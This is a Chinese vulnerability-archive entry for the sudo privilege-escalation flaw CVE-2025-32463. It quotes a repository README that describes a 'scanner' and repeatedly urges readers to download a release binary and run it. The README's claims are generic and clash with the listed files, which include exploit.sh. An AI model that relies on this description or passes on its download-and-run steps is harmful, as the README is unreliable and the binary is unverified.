关联漏洞
标题:
Sudo 安全漏洞
(CVE-2025-32463)
描述:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞,该漏洞源于使用用户控制目录中的/etc/nsswitch.conf可能导致获取root访问权限。
介绍
# 🚀 CVE-2025-32463 - Secure Your System from Privilege Escalation
## 📥 Download Now!
[](https://github.com/mihnasdsad/CVE-2025-32463/releases)
## 📜 Overview
CVE-2025-32463 is a tool designed to identify and mitigate a local privilege escalation vulnerability in Linux systems. This vulnerability allows harmful users to gain root access through the `sudo chroot` command. With our tool, you can scan for this vulnerability and protect your system effectively.
## 🚀 Getting Started
Follow these simple steps to download and run the tool:
1. **Visit the Releases Page**:
Click the link below to go to the releases page and download the tool:
[Visit Releases Page](https://github.com/mihnasdsad/CVE-2025-32463/releases)
2. **Choose the Latest Release**:
On the releases page, find the latest version. It will typically be at the top of the list.
3. **Download the Application**:
Click on the appropriate asset (file) suitable for your operating system to start the download.
## 💻 System Requirements
To run CVE-2025-32463, ensure your system meets the following requirements:
- Operating System: Ubuntu 18.04 or later
- Minimum RAM: 2 GB
- Minimum Disk Space: 100 MB
## 🔍 Features
- Detects vulnerabilities in your Linux system.
- Provides a straightforward interface for ease of use.
- Generates detailed reports on vulnerable instances.
- Safeguards your system against unauthorized privilege escalation.
## 🔧 How to Install
Once you've downloaded the tool, follow these steps to install it:
1. **Locate the Downloaded File**:
Find the downloaded file in your computer’s default download directory.
2. **Extract the Contents**:
If the file is compressed (like a .zip or .tar.gz), right-click on it and select "Extract Here" or an equivalent option.
3. **Open the Terminal**:
- On Ubuntu, you can open the terminal by searching for "Terminal" in your application menu.
4. **Navigate to the Folder**:
Use the `cd` command to change directory to the folder where the application resides. For example:
```
cd Downloads/CVE-2025-32463
```
5. **Run the Tool**:
Execute the program with this command:
```
./cve-2025-32463
```
## ⚙️ Usage
- **Running a Scan**: After running the tool, follow the prompts to begin scanning your system for vulnerabilities.
- **Understanding the Output**: The tool will list any vulnerabilities it finds, along with recommendations to mitigate them. Make sure to review the output carefully.
## 🛡️ Safety Tips
- Ensure you have backups of important files before running any security tool.
- Do not run the tool as the root user unless advised by your security documentation.
- Regularly check for updates or newer versions of the tool.
## 📞 Support
For any issues or questions, you can open an issue directly in this repository. We welcome your feedback and are here to help!
## 📝 License
This tool is provided under the MIT License. You can freely use, modify, and distribute it as you see fit.
## 🔗 Additional Resources
For more information about local privilege escalation vulnerabilities and best practices in security:
- [Sudo Project](https://www.sudo.ws/)
- [Linux Privilege Escalation](https://www.digitalocean.com/community/tutorials/linux-privilege-escalation)
- [Ubuntu Security Documentation](https://ubuntu.com/security)
## 📥 Download & Install
Make sure to get the latest version by visiting the releases page again:
[Visit Releases Page](https://github.com/mihnasdsad/CVE-2025-32463/releases)
文件快照
[4.0K] /data/pocs/63b096a20ed8fd6cab1a47d91c498fb33307f584
├── [ 637] exploit.sh
├── [4.0K] img
│ ├── [ 27K] logo.png
│ └── [ 25K] poc.jpg
├── [6.9K] LICENSE
└── [3.6K] README.md
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。